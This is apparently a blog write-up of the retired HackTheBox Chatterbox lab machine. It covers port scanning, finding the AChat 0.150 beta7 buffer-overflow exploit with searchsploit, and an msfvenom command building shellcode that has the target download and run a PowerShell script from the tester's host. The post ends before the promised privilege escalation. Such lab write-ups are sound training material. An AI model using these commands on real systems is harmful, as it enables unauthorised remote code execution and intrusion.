Today I am solving the HackTheBox Chatterbox machine. This is a retired machine but is great to study Windows privilege escalation.

HackTheBox Chatterbox
HackTheBox Chatterbox

I am doing this machine to help me understand better the Windows Exploitation and prepare myself to eCPPTv2 certification by eLearnSecurity.

HackTheBox Chatterbox

To start I will scan the machine with rustscan checking all 65535 ports available.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ rustscan -a chatterbox.htb -- -p-

The machine has two open ports let’s check what services are running on them using nmap.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ nmap -T4 -A -p- chatterbox.htb -Pn -p9255,9256

Nmap scan shows the service AChat system is running on both ports the port 9255 has an HTTPD service and the port 9256 has the chat system.

Let’s search for an exploit using searchsploit script and enumerate all folders and files on port 9255 since it has a HTTP server running.

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ searchsploit achat

searchsploit achat

Great searchsploit found an exploit for a Remote Buffer Overflow on Achat system, 

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ searchsploit -m windows/remote/36025.py
  Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/36025
     Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
File Type: Python script, ASCII text executable, with very long lines (637)

Copied to: /home/rfs/HackTheBox/HTB_Chatterbox/36025.py

Exploitation

How to Generate Metasploit Payloads

┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-ObjectNet.WebClient).downloadString('http://10.10.14.52/writeup.ps1')\"" -e x86/unicode_mixed -b'\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python > new.txt
┌──(rfs㉿PopLabSec)-[~/HackTheBox/HTB_Chatterbox]
└─$ python3 -m http.server 80

HackTheBox Chatterbox

Achat 0.150 beta7 – Remote Buffer Overflow

old, Hack The Box, Hacking Playgrounds